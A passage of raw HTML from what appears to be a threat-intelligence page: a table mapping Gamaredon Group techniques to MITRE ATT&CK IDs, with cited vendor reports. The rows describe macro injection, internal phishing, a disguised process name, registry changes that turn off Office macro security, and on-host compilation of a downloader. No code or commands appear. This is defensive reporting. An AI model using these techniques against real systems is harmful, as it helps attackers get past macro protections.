Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has downloaded additional malware and tools onto a compromised host.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 
8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1559"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1559</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1559/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1559"><span style="font-size: 12pt; font-family: Arial, 
sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Inter-Process Communication</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1559/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Component Object Model</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> malware can insert malicious macros into documents using a </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: 
baseline;">Microsoft.Office.Interop</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> object.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1534"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1534</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 
0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1534"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Internal Spearphishing</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 
0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1036"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1036</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1036/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a 
href="https://attack.mitre.org/techniques/T1036"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Masquerading</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1036/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Match Legitimate Name or Location</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used legitimate process names to hide malware including </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: 
normal; font-variant-alternates: normal; vertical-align: baseline;">svchosst</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.</span><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:69.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1112"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1112</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 
0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1112"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Modify Registry</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has removed security settings for VBA macro execution by changing registry values </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">HKCU\Software\Microsoft\Office\&lt;version&gt;\&lt;product&gt;\Security\VBAWarnings</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; 
font-variant-alternates: normal; vertical-align: baseline;"> and </span><span style="font-size: 10.5pt; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">HKCU\Software\Microsoft\Office\&lt;version&gt;\&lt;product&gt;\Security\AccessVBOM</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 
0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1106"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1106</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1106"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Native API</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; 
font-variant-alternates: normal; vertical-align: baseline;"> malware has used </span><span style="font-size: 10.5pt; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">CreateProcess</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> to launch additional malicious components.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: 
normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1027</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Obfuscated Files or Information</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has delivered self-extracting 7z archive files within malicious document attachments.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: 
normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Binary Padding</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a 
href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has obfuscated .NET executables by inserting junk code.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/004"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.004</span></a></p></td><td style="border-left:solid #dfdfdf 
0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/004"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Compile After Delivery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has compiled the source code for a downloader directly on the infected system using the built-in </span><span style="font-size: 10.5pt; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Microsoft.CSharp.CSharpCodeProvider</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; 
